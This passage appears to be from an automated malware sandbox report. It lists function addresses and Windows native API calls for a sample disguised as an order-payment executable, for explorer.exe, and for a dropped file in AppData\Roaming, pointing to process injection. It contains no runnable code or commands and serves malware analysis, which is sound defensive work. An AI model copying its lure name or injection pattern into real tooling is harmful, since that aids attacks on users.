Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01264340 NtSetContextThread,	9_2_01264340
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01264650 NtSuspendThread,	9_2_01264650
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262BA0 NtEnumerateValueKey,	9_2_01262BA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262B80 NtQueryInformationFile,	9_2_01262B80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262BE0 NtQueryValueKey,	9_2_01262BE0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262AB0 NtWaitForSingleObject,	9_2_01262AB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262AF0 NtWriteFile,	9_2_01262AF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262D00 NtSetInformationFile,	9_2_01262D00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262DB0 NtEnumerateKey,	9_2_01262DB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262C00 NtQueryInformationProcess,	9_2_01262C00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262C60 NtCreateKey,	9_2_01262C60
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262CF0 NtOpenProcess,	9_2_01262CF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262CC0 NtQueryVirtualMemory,	9_2_01262CC0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262F60 NtCreateProcessEx,	9_2_01262F60
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262FA0 NtQuerySection,	9_2_01262FA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262E30 NtWriteVirtualMemory,	9_2_01262E30
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01262EE0 NtQueueApcThread,	9_2_01262EE0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01263010 NtOpenDirectoryObject,	9_2_01263010
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01263090 NtSetValueKey,	9_2_01263090
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012635C0 NtCreateMutant,	9_2_012635C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012639B0 NtGetContextThread,	9_2_012639B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01263D10 NtOpenProcessToken,	9_2_01263D10
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01263D70 NtOpenThread,	9_2_01263D70
Source: C:\Windows\explorer.exe	Code function: 10_2_111FAE12 NtProtectVirtualMemory,	10_2_111FAE12
Source: C:\Windows\explorer.exe	Code function: 10_2_111F9232 NtCreateFile,	10_2_111F9232
Source: C:\Windows\explorer.exe	Code function: 10_2_111FAE0A NtProtectVirtualMemory,	10_2_111FAE0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_05312D10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_05312DF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312DD0 NtDelayExecution,LdrInitializeThunk,	13_2_05312DD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_05312C70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312C60 NtCreateKey,LdrInitializeThunk,	13_2_05312C60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_05312CA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312F30 NtCreateSection,LdrInitializeThunk,	13_2_05312F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312FE0 NtCreateFile,LdrInitializeThunk,	13_2_05312FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_05312EA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312B60 NtClose,LdrInitializeThunk,	13_2_05312B60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_05312BF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_05312BE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312AD0 NtReadFile,LdrInitializeThunk,	13_2_05312AD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053135C0 NtCreateMutant,LdrInitializeThunk,	13_2_053135C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05314650 NtSuspendThread,	13_2_05314650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05314340 NtSetContextThread,	13_2_05314340
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312D30 NtUnmapViewOfSection,	13_2_05312D30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312D00 NtSetInformationFile,	13_2_05312D00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312DB0 NtEnumerateKey,	13_2_05312DB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312C00 NtQueryInformationProcess,	13_2_05312C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312CF0 NtOpenProcess,	13_2_05312CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312CC0 NtQueryVirtualMemory,	13_2_05312CC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312F60 NtCreateProcessEx,	13_2_05312F60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312FB0 NtResumeThread,	13_2_05312FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312FA0 NtQuerySection,	13_2_05312FA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312F90 NtProtectVirtualMemory,	13_2_05312F90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312E30 NtWriteVirtualMemory,	13_2_05312E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312E80 NtReadVirtualMemory,	13_2_05312E80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312EE0 NtQueueApcThread,	13_2_05312EE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312BA0 NtEnumerateValueKey,	13_2_05312BA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312B80 NtQueryInformationFile,	13_2_05312B80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312AB0 NtWaitForSingleObject,	13_2_05312AB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05312AF0 NtWriteFile,	13_2_05312AF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05313010 NtOpenDirectoryObject,	13_2_05313010
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05313090 NtSetValueKey,	13_2_05313090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05313D10 NtOpenProcessToken,	13_2_05313D10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05313D70 NtOpenThread,	13_2_05313D70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_053139B0 NtGetContextThread,	13_2_053139B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A360 NtCreateFile,	13_2_0330A360
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A540 NtAllocateVirtualMemory,	13_2_0330A540
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A410 NtReadFile,	13_2_0330A410
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A490 NtClose,	13_2_0330A490
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A53A NtAllocateVirtualMemory,	13_2_0330A53A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A40B NtReadFile,	13_2_0330A40B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A45B NtReadFile,	13_2_0330A45B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A48C NtClose,	13_2_0330A48C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650AF00 NtQueryInformationProcess,	13_2_0650AF00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B410 NtReadFile,	13_2_0650B410
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B490 NtClose,	13_2_0650B490
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B500 NtReadVirtualMemory,	13_2_0650B500
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B360 NtCreateFile,	13_2_0650B360
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B45B NtReadFile,	13_2_0650B45B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B40B NtReadFile,	13_2_0650B40B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0650B48C NtClose,	13_2_0650B48C

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D40871	0_2_02D40871
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D426B1	0_2_02D426B1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D43650	0_2_02D43650
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D41C91	0_2_02D41C91
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D41418	0_2_02D41418
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45AD8	0_2_02D45AD8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45AE8	0_2_02D45AE8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D452B9	0_2_02D452B9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D41370	0_2_02D41370
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45890	0_2_02D45890
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45881	0_2_02D45881
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45688	0_2_02D45688
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45679	0_2_02D45679
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D44FC8	0_2_02D44FC8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D44FB8	0_2_02D44FB8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D45C89	0_2_02D45C89
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D44443	0_2_02D44443
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D44448	0_2_02D44448
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D4355A	0_2_02D4355A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_02D43507	0_2_02D43507
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_05448B68	0_2_05448B68
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_05448B78	0_2_05448B78
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_05446B8C	0_2_05446B8C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_098BACE8	0_2_098BACE8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_098B0006	0_2_098B0006
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_098B0040	0_2_098B0040
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_098BC6D0	0_2_098BC6D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A048BDA	0_2_0A048BDA
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A046E28	0_2_0A046E28
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A042B80	0_2_0A042B80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A042B90	0_2_0A042B90
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A040840	0_2_0A040840
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A0410B0	0_2_0A0410B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A046E18	0_2_0A046E18
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A042758	0_2_0A042758
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_0A040C78	0_2_0A040C78
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 0_2_098B6E00	0_2_098B6E00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041E040	9_2_0041E040
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D9F1	9_2_0041D9F1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041E273	9_2_0041E273
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041ED6F	9_2_0041ED6F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041E57B	9_2_0041E57B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00402D87	9_2_00402D87
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D5A3	9_2_0041D5A3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041D5A6	9_2_0041D5A6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00409E60	9_2_00409E60
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041DE2E	9_2_0041DE2E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041DF42	9_2_0041DF42
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0041E7DC	9_2_0041E7DC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220100	9_2_01220100
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CA118	9_2_012CA118
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B8158	9_2_012B8158
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F01AA	9_2_012F01AA
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E41A2	9_2_012E41A2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E81CC	9_2_012E81CC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EA352	9_2_012EA352
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F03E6	9_2_012F03E6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E3F0	9_2_0123E3F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B02C0	9_2_012B02C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230535	9_2_01230535
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F0591	9_2_012F0591
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D4420	9_2_012D4420
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E2446	9_2_012E2446
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DE4F6	9_2_012DE4F6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230770	9_2_01230770
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01254750	9_2_01254750
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122C7C0	9_2_0122C7C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124C6E0	9_2_0124C6E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01246962	9_2_01246962
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012329A0	9_2_012329A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012FA9A6	9_2_012FA9A6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123A840	9_2_0123A840
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01232840	9_2_01232840
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012168B8	9_2_012168B8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125E8F0	9_2_0125E8F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EAB40	9_2_012EAB40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E6BD7	9_2_012E6BD7
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122EA80	9_2_0122EA80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123AD00	9_2_0123AD00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CCD1F	9_2_012CCD1F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01248DBF	9_2_01248DBF
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122ADE0	9_2_0122ADE0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230C00	9_2_01230C00
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0CB5	9_2_012D0CB5
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01220CF2	9_2_01220CF2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01272F28	9_2_01272F28
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01250F30	9_2_01250F30
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D2F30	9_2_012D2F30
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A4F40	9_2_012A4F40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012AEFA0	9_2_012AEFA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123CFE0	9_2_0123CFE0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01222FC8	9_2_01222FC8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EEE26	9_2_012EEE26
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01230E59	9_2_01230E59
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01242E90	9_2_01242E90
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012ECE93	9_2_012ECE93
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EEEDB	9_2_012EEEDB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012FB16B	9_2_012FB16B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0126516C	9_2_0126516C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121F172	9_2_0121F172
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123B1B0	9_2_0123B1B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E70E9	9_2_012E70E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EF0E0	9_2_012EF0E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DF0CC	9_2_012DF0CC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012370C0	9_2_012370C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E132D	9_2_012E132D
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121D34C	9_2_0121D34C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0127739A	9_2_0127739A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012352A0	9_2_012352A0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D12ED	9_2_012D12ED
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124B2C0	9_2_0124B2C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E7571	9_2_012E7571
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CD5B0	9_2_012CD5B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EF43F	9_2_012EF43F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01221460	9_2_01221460
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EF7B0	9_2_012EF7B0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01275630	9_2_01275630
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E16CC	9_2_012E16CC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C5910	9_2_012C5910
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01239950	9_2_01239950
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124B950	9_2_0124B950
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129D800	9_2_0129D800
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012338E0	9_2_012338E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EFB76	9_2_012EFB76
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124FB80	9_2_0124FB80
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A5BF0	9_2_012A5BF0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0126DBF9	9_2_0126DBF9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A3A6C	9_2_012A3A6C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EFA49	9_2_012EFA49
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E7A46	9_2_012E7A46
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CDAAC	9_2_012CDAAC
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01275AA0	9_2_01275AA0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D1AA3	9_2_012D1AA3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DDAC6	9_2_012DDAC6
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E7D73	9_2_012E7D73
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01233D40	9_2_01233D40
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E1D5A	9_2_012E1D5A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124FDC0	9_2_0124FDC0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A9C32	9_2_012A9C32
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EFCF2	9_2_012EFCF2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EFF09	9_2_012EFF09
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EFFB1	9_2_012EFFB1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01231F92	9_2_01231F92
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F3FD5	9_2_011F3FD5
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_011F3FD2	9_2_011F3FD2
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01239EB0	9_2_01239EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_10075036	10_2_10075036
Source: C:\Windows\explorer.exe	Code function: 10_2_1006C082	10_2_1006C082
Source: C:\Windows\explorer.exe	Code function: 10_2_1006DD02	10_2_1006DD02
Source: C:\Windows\explorer.exe	Code function: 10_2_10073912	10_2_10073912
Source: C:\Windows\explorer.exe	Code function: 10_2_100795CD	10_2_100795CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10076232	10_2_10076232
Source: C:\Windows\explorer.exe	Code function: 10_2_10070B32	10_2_10070B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10070B30	10_2_10070B30
Source: C:\Windows\explorer.exe	Code function: 10_2_106E3036	10_2_106E3036
Source: C:\Windows\explorer.exe	Code function: 10_2_106DA082	10_2_106DA082
Source: C:\Windows\explorer.exe	Code function: 10_2_106DBD02	10_2_106DBD02
Source: C:\Windows\explorer.exe	Code function: 10_2_106E1912	10_2_106E1912
Source: C:\Windows\explorer.exe	Code function: 10_2_106E75CD	10_2_106E75CD
Source: C:\Windows\explorer.exe	Code function: 10_2_106E4232	10_2_106E4232
Source: C:\Windows\explorer.exe	Code function: 10_2_106DEB30	10_2_106DEB30
Source: C:\Windows\explorer.exe	Code function: 10_2_106DEB32	10_2_106DEB32
Source: C:\Windows\explorer.exe	Code function: 10_2_111F9232	10_2_111F9232
Source: C:\Windows\explorer.exe	Code function: 10_2_111F6912	10_2_111F6912
Source: C:\Windows\explorer.exe	Code function: 10_2_111F0D02	10_2_111F0D02
Source: C:\Windows\explorer.exe	Code function: 10_2_111F3B32	10_2_111F3B32
Source: C:\Windows\explorer.exe	Code function: 10_2_111F3B30	10_2_111F3B30
Source: C:\Windows\explorer.exe	Code function: 10_2_111FC5CD	10_2_111FC5CD
Source: C:\Windows\explorer.exe	Code function: 10_2_111F8036	10_2_111F8036
Source: C:\Windows\explorer.exe	Code function: 10_2_111EF082	10_2_111EF082
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C0871	11_2_031C0871
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C3650	11_2_031C3650
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C26B1	11_2_031C26B1
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C1418	11_2_031C1418
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C1C91	11_2_031C1C91
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C1370	11_2_031C1370
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C1385	11_2_031C1385
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C52B9	11_2_031C52B9
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5ADA	11_2_031C5ADA
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5AE8	11_2_031C5AE8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5890	11_2_031C5890
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5882	11_2_031C5882
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C4FB8	11_2_031C4FB8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C4FC8	11_2_031C4FC8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5679	11_2_031C5679
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5688	11_2_031C5688
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C3593	11_2_031C3593
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C4438	11_2_031C4438
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C4448	11_2_031C4448
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_031C5C89	11_2_031C5C89
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05816B8C	11_2_05816B8C
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05818B68	11_2_05818B68
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_05818B78	11_2_05818B78
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_09DC0040	11_2_09DC0040
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_09DC0011	11_2_09DC0011
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_09DCACE8	11_2_09DCACE8
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Code function: 11_2_09DCC6D0	11_2_09DCC6D0
